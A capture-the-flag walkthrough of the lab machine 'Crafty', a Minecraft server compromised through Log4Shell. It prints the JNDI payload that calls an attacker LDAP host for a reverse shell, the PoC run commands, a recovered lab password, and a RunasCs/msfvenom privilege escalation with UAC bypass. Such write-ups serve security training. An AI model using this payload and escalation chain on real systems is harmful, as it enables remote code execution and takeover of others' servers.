Week 6. Crafty

TL;DR

This is a gaming Windows Server 2019 running Minecraft 1.16.5, which is known to be affected by the Log4Shell vulnerability (CVE-2021-44228). There are several Log4Shell PoCs in GitHub to get a foothold in the server. The administrator password is found in a JAR file found in the file system.

KEYWORDS

Minecraft, Log4Shell, CVE-2021-44228, Java decompiler, RunasCS.

REFERENCES

https://www.cvedetails.com/cve/CVE-2021-44228/

https://github.com/kozmer/log4j-shell-poc

https://www.youtube.com/watch?v=7qoPDq41xhQ

https://mirrors.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz

https://tlauncher.org/

https://www.decompiler.com/

https://github.com/antonioCoco/RunasCs

ENUMERATION

Port scan.

> nmap $target -p- --min-rate=5000 -Pn --open --reason
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 04:05 EST
Nmap scan report for crafty.htb (10.10.11.249)
Host is up, received user-set (0.081s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE   REASON
80/tcp    open  http      syn-ack
25565/tcp open  minecraft syn-ack
 
Nmap done: 1 IP address (1 host up) scanned in 44.87 seconds

Enumerate the open ports.

> nmap $target -p80,25565 -sV -sC -Pn -vv
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 04:07 EST
Nmap scan report for crafty.htb (10.10.11.249)
Host is up, received user-set (0.091s latency).
Scanned at 2024-02-11 04:08:00 EST for 15s
 
PORT      STATE SERVICE   REASON  VERSION
80/tcp    open  http      syn-ack Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Crafty - Official Website
|_http-server-header: Microsoft-IIS/10.0
25565/tcp open  minecraft syn-ack Minecraft 1.16.5 (Protocol: 127, Message: Crafty Server, Users: 1/100)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
 
Nmap done: 1 IP address (1 host up) scanned in 16.07 seconds

Update the /etc/hosts file and enumerate the site with Firefox. We see information about a Minecraft server running at play.crafty.htb. There are no more interaction points with the backend in the website.

In summary, we have found a Minecraft server v1.16.5 running on port 25565.

USER

Searching for Minecraft 1.16.5 vulnerabilities in the web, we find out that versions from 1.8.8 to 1.18.1 are affected by Log4Shell vulnerability, a critical bug in the Apache log4j java logging library (https://www.cvedetails.com/cve/CVE-2021-44228/).

If you search in GitHub you will find several PoCs for Log4Shell exploitation, and there are also tutorials in Youtube, such as this: https://www.youtube.com/watch?v=7qoPDq41xhQ

We will use this one: https://github.com/kozmer/log4j-shell-poc. Note that the poc.py cannot be used off-the-self, if you inspect carefully the source code you will see 2 modifications are needed.

First, the PoC is designed to be used in Linux, but since crafty.htb is a Windows machine, a first modification is needed to adapt the exploit part to the Windows systems (just replace /etc/sh with cmd).

Next, according to the author you need to copy your version of Java in the repository root directory. The author provides a link to Oracle but, since registration is required, another one was used: https://mirrors.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz

Follow the author instructions: unpack the Java package in the repository root folder and rename the directory as ./jdk1.8.0_20, to match the Java path used in the source code. Alternatively, you can leave the directory named as you want and modify the source code accordingly.

Once finished, verify Java is successfully installed.

> ./jdk1.8.0_20/bin/java -version
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
java version "1.8.0_202"
Java(TM) SE Runtime Environment (build 1.8.0_202-b08)
Java HotSpot(TM) 64-Bit Server VM (build 25.202-b08, mixed mode)

Now run the exploit.

> python3 poc.py --userip <your kali ip here> --webport 8000 --lport 1919
 
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
 
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Exploit java class created success
[+] Setting up LDAP server
 
[+] Send me: ${jndi:ldap://10.10.xxx.xxx:1389/a}
 
[+] Starting Webserver on port 8000 http://0.0.0.0:8000
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Listening on 0.0.0.0:1389

The PoC automatically starts an LDAP server on ports 1389 and also generates a payload called Exploit.class which will be served on an HTTP server running on port 8000.

You also need to start a listener on port 1919 (this port can be modified with the –lport option).

The PoC provides the payload we need to inject in the Minecraft chat.

${jndi:ldap://10.10.xxx.xxx:1389/a}

Next step is to join a game in the Minecraft server. For this, download a Minecraft client such as this: https://tlauncher.org/en/download_1/minecraft-1-16-5_12582.html. Choose the version that suits your platform, in this case we will use the .jar Linux version available here: https://tlauncher.org/jar

Unzip and run the client.

> java -jar TLauncher-2.895.jar

Once the client start, make sure you install the Minecraft version 1.65.5, which is the one that matches the one running in the server.

When the installation is completed, click on "Enter the game". In the startup screen click on "Multiplayer" and add a new server play.crafty.htb. Join the server and as soon as the game starts press "T" to open the chat and enter the payload.

${jndi:ldap://10.10.xxx.xxx:1389/a}

When the payload is entered in the chat, a reverse shell is received on port 1919.

Which can be used to retrieve the user flag.

SYSTEM

Start from the user shell and take the opportunity to enumerate the system.

> systeminfo
 
Host Name:                 CRAFTY
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
                           [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,369 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 2,729 MB

Locate the file c:\Users\svc_minecraft\server\plugins\playercounter-1.0-SNAPSHOT.jar in the file system. Inspect the file and extract the class /htb/crafty/playercounter/Playercounter.class Decompile using whatever method you like, for example, using an online decompiler: https://www.decompiler.com/

Looks like credential s67u84zKq8IXw is used to connect to an internal service running on 27015 for management purposes.

Generate an EXE payload with msfvenom, transfer the shell.exe payload and runascs.exe (https://github.com/antonioCoco/RunasCs) to the victim and run them.

> .\runascs administrator s67u84zKq8IXw shell.exe --bypass-uac

A reverse shell is received on the listener.

You are root.